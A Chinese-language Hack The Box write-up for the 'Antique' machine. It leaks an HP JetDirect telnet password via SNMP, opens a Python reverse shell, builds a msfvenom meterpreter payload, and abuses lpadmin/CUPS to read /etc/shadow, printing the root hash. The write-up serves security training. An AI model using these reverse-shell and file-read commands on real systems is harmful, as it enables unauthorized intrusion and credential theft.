美文网首页
【HTB】Antique(SNMP信息泄露,lpadmin用户组

【HTB】Antique(SNMP信息泄露,lpadmin用户组

作者: 天线锅仔 | 来源:发表于2021-12-01 01:22 被阅读0次

    免责声明

    本文渗透的主机经过合法授权。本文使用的工具和方法仅限学习交流使用,请不要将文中使用的工具和渗透思路用于任何非法用途,对此产生的一切后果,本人不承担任何责任,也不对造成的任何误用或损害负责。

    服务探测

    ┌──(root💀kali)-[~/htb/Antique]
    └─# nmap -sV -Pn 10.10.11.107
    Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-30 07:44 EST
    Nmap scan report for 10.10.11.107
    Host is up (0.39s latency).
    Not shown: 999 closed ports
    PORT   STATE SERVICE VERSION
    23/tcp open  telnet?
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port23-TCP:V=7.91%I=7%D=11/30%Time=61A61CDF%P=x86_64-pc-linux-gnu%r(NUL
    SF:L,F,"\nHP\x20JetDirect\n\n")%r(GenericLines,19,"\nHP\x20JetDirect\n\nPa
    SF:ssword:\x20")%r(tn3270,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(GetRe
    SF:quest,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(HTTPOptions,19,"\nHP\x
    SF:20JetDirect\n\nPassword:\x20")%r(RTSPRequest,19,"\nHP\x20JetDirect\n\nP
    SF:assword:\x20")%r(RPCCheck,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(DN
    SF:SVersionBindReqTCP,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(DNSStatus
    SF:RequestTCP,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(Help,19,"\nHP\x20
    SF:JetDirect\n\nPassword:\x20")%r(SSLSessionReq,19,"\nHP\x20JetDirect\n\nP
    SF:assword:\x20")%r(TerminalServerCookie,19,"\nHP\x20JetDirect\n\nPassword
    SF::\x20")%r(TLSSessionReq,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(Kerb
    SF:eros,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(SMBProgNeg,19,"\nHP\x20
    SF:JetDirect\n\nPassword:\x20")%r(X11Probe,19,"\nHP\x20JetDirect\n\nPasswo
    SF:rd:\x20")%r(FourOhFourRequest,19,"\nHP\x20JetDirect\n\nPassword:\x20")%
    SF:r(LPDString,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(LDAPSearchReq,19
    SF:,"\nHP\x20JetDirect\n\nPassword:\x20")%r(LDAPBindReq,19,"\nHP\x20JetDir
    SF:ect\n\nPassword:\x20")%r(SIPOptions,19,"\nHP\x20JetDirect\n\nPassword:\
    SF:x20")%r(LANDesk-RC,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(TerminalS
    SF:erver,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(NCP,19,"\nHP\x20JetDir
    SF:ect\n\nPassword:\x20")%r(NotesRPC,19,"\nHP\x20JetDirect\n\nPassword:\x2
    SF:0")%r(JavaRMI,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(WMSRequest,19,
    SF:"\nHP\x20JetDirect\n\nPassword:\x20")%r(oracle-tns,19,"\nHP\x20JetDirec
    SF:t\n\nPassword:\x20")%r(ms-sql-s,19,"\nHP\x20JetDirect\n\nPassword:\x20"
    SF:)%r(afp,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(giop,19,"\nHP\x20Jet
    SF:Direct\n\nPassword:\x20");
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 229.74 seconds
    
    

    23端口开了一个telnet服务,nc连上去看看

    ┌──(root💀kali)-[~/htb/Antique]
    └─# nc 10.10.11.107 23             
    
    HP JetDirect
    
    ls
    Password: 123456
    Invalid password
    
    

    问候语是HP JetDirect,查了一下是惠普的打印机

    需要一个密码才能登陆telnet,但是不需要账号

    根据HP JetDirect telnet作为关键字在谷歌上找到这篇文章

    利用Getting a JetDirect password remotely using the SNMP vulnerability的方法,我们输入以下信息

    ──(root💀kali)-[~/htb/Antique]
    └─# snmpget -v 1 -c public 10.10.11.107 .1.3.6.1.4.1.11.2.3.9.1.1.13.0
    Created directory: /var/lib/snmp/cert_indexes
    iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 
    33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135 
    
    

    把上面的数字拿到这个hex2text网站,解得密码是:P@ssw0rd@123!!123

    用上面的凭证登陆telnet账号

    ┌──(root💀kali)-[~/htb/Antique]
    └─# nc 10.10.11.107 23
    
    HP JetDirect
    
    
    Password: P@ssw0rd@123!!123
    
    Please type "?" for HELP
    > ?
    
    To Change/Configure Parameters Enter:
    Parameter-name: value <Carriage Return>
    
    Parameter-name Type of value
    ip: IP-address in dotted notation
    subnet-mask: address in dotted notation (enter 0 for default)
    default-gw: address in dotted notation (enter 0 for default)
    syslog-svr: address in dotted notation (enter 0 for default)
    idle-timeout: seconds in integers
    set-cmnty-name: alpha-numeric string (32 chars max)
    host-name: alpha-numeric string (upper case only, 32 chars max)
    dhcp-config: 0 to disable, 1 to enable
    allow: <ip> [mask] (0 to clear, list to display, 10 max)
    
    addrawport: <TCP port num> (<TCP port num> 3000-9000)
    deleterawport: <TCP port num>
    listrawport: (No parameter required)
    
    exec: execute system commands (exec id)
    exit: quit from telnet session
    > exec id
    uid=7(lp) gid=7(lp) groups=7(lp),19(lpadmin)
    > exec whoami
    lp
    /var/spool/lpd
    > exec find / -name user.txt
    /home/lp/user.txt
    /var/spool/lpd/user.txt
    
    

    提权

    查看系统相关信息

    > exec uname -a
    Linux antique 5.13.0-051300-generic #202106272333 SMP Sun Jun 27 23:36:43 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
    > exec python3 --version
    Python 3.8.10
    
    

    发现安装了python3,用下面命令反弹一个趁手的shell

    exec python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.15",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

    ┌──(root💀kali)-[~/htb/Antique]
    └─# nc -lnvp 4242                                                                                                                                                                                                                            1 ⨯
    listening on [any] 4242 ...
    connect to [10.10.14.15] from (UNKNOWN) [10.10.11.107] 41100
    $ id
    id
    uid=7(lp) gid=7(lp) groups=7(lp),19(lpadmin)
    $ 
    
    

    我们发现lpadmin这个用户组比较可疑,可能可以用于提权,经过谷歌以后,我找到了这篇文章

    里面提到:

    members of lpadmin can read every file on server via cups

    这个用户组的人可以读取系统里面的任意文件,于是继续搜索提权脚本,最后发现一个msf的模块multi/escalate/cups_root_file_read可以用于提权

    我们先编译一个msf的反弹shell

    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.14.15 LPORT=4444 -f elf > shell.elf

    传到靶机,触发,拿到msf,执行提权脚本

    msf6 exploit(multi/handler) > run
    
    [*] Started reverse TCP handler on 10.10.14.15:4444 
    [*] Sending stage (980808 bytes) to 10.10.11.107
    [*] Meterpreter session 2 opened (10.10.14.15:4444 -> 10.10.11.107:52856) at 2021-11-30 11:46:50 -0500
    
    meterpreter > run multi/escalate/cups_root_file_read
    
    [!] SESSION may not be compatible with this module.
    [+] User in lpadmin group, continuing...
    [+] cupsctl binary found in $PATH
    [+] nc binary found in $PATH
    [*] Found CUPS 1.6.1
    [+] File /etc/shadow (998 bytes) saved to /root/.msf4/loot/20211130114734_default_10.10.11.107_cups_file_read_957992.bin
    [*] Cleaning up...
    meterpreter > getuid
    
    

    查看/etc/shadow文件

    ┌──(root💀kali)-[~/htb/Antique]
    └─# cat /root/.msf4/loot/20211130114734_default_10.10.11.107_cups_file_read_957992.bin
    root:$6$UgdyXjp3KC.86MSD$sMLE6Yo9Wwt636DSE2Jhd9M5hvWoy6btMs.oYtGQp7x4iDRlGCGJg8Ge9NO84P5lzjHN1WViD3jqX/VMw4LiR.:18760:0:99999:7:::
    daemon:*:18375:0:99999:7:::
    bin:*:18375:0:99999:7:::
    sys:*:18375:0:99999:7:::
    sync:*:18375:0:99999:7:::
    games:*:18375:0:99999:7:::
    man:*:18375:0:99999:7:::
    lp:*:18375:0:99999:7:::
    mail:*:18375:0:99999:7:::
    news:*:18375:0:99999:7:::
    uucp:*:18375:0:99999:7:::
    proxy:*:18375:0:99999:7:::
    www-data:*:18375:0:99999:7:::
    backup:*:18375:0:99999:7:::
    list:*:18375:0:99999:7:::
    irc:*:18375:0:99999:7:::
    gnats:*:18375:0:99999:7:::
    nobody:*:18375:0:99999:7:::
    systemd-network:*:18375:0:99999:7:::
    systemd-resolve:*:18375:0:99999:7:::
    systemd-timesync:*:18375:0:99999:7:::
    messagebus:*:18375:0:99999:7:::
    syslog:*:18375:0:99999:7:::
    _apt:*:18375:0:99999:7:::
    tss:*:18375:0:99999:7:::
    uuidd:*:18375:0:99999:7:::
    tcpdump:*:18375:0:99999:7:::
    landscape:*:18375:0:99999:7:::
    pollinate:*:18375:0:99999:7:::
    systemd-coredump:!!:18389::::::
    lxd:!:18389::::::
    usbmux:*:18891:0:99999:7:::  
    

    编辑成john可以读取的格式

    ┌──(root💀kali)-[~/htb/Antique]
    └─# cat shadow.txt 
    root:$6$UgdyXjp3KC.86MSD$sMLE6Yo9Wwt636DSE2Jhd9M5hvWoy6btMs.oYtGQp7x4iDRlGCGJg8Ge9NO84P5lzjHN1WViD3jqX/VMw4LiR.:18760:0:99999:7:::
                                                                                                                                                                                                                          
    ┌──(root💀kali)-[~/htb/Antique]
    └─# unshadow passwd.txt shadow.txt > unshadowed.txt
                                                                                                                                                                                                                          
    ┌──(root💀kali)-[~/htb/Antique]
    └─# cat unshadowed.txt 
    root:$6$UgdyXjp3KC.86MSD$sMLE6Yo9Wwt636DSE2Jhd9M5hvWoy6btMs.oYtGQp7x4iDRlGCGJg8Ge9NO84P5lzjHN1WViD3jqX/VMw4LiR.:0:0:root:/root:/bin/bash
    
    

    但是我没办法爆破出这个密码

    于是转换思路,root下会不会有id_rsa文件
    编辑msf模块

    msf6 > use multi/escalate/cups_root_file_read
    msf6 post(multi/escalate/cups_root_file_read) > edit
    
    

    把46行改成/root/.ssh/id_rsa

    编辑保存

    下载到本地

    meterpreter > run multi/escalate/cups_root_file_read
    
    [!] SESSION may not be compatible with this module.
    [+] User in lpadmin group, continuing...
    [+] cupsctl binary found in $PATH
    [+] nc binary found in $PATH
    [*] Found CUPS 1.6.1
    [+] File /root/.ssh/id_rsa (341 bytes) saved to /root/.msf4/loot/20211130120322_default_10.10.11.107_cups_file_read_145418.bin
    [*] Cleaning up...
    
    

    然而没有这个文件:

    ┌──(root💀kali)-[~]
    └─# cat /root/.msf4/loot/20211130120601_default_10.10.11.107_cups_file_read_604992.bin
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
    <HTML>
    <HEAD>
            <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
            <TITLE>Not Found - CUPS v1.6.1</TITLE>
            <LINK REL="STYLESHEET" TYPE="text/css" HREF="/cups.css">
    </HEAD>
    <BODY>
    <H1>Not Found</H1>
    <P></P>
    </BODY>
    </HTML>   
    

    最后只好把/root/root.txt下载到本地,弄完已经凌晨一点多,算是结束这次渗透

    meterpreter > run multi/escalate/cups_root_file_read
    
    [!] SESSION may not be compatible with this module.
    [+] User in lpadmin group, continuing...
    [+] cupsctl binary found in $PATH
    [+] nc binary found in $PATH
    [*] Found CUPS 1.6.1
    [+] File /root/root.txt (32 bytes) saved to /root/.msf4/loot/20211130120724_default_10.10.11.107_cups_file_read_556098.txt
    [*] Cleaning up...
    
    

    相关文章

      网友评论

          本文标题:【HTB】Antique(SNMP信息泄露,lpadmin用户组

          本文链接:https://www.haomeiwen.com/subject/vfgjxrtx.html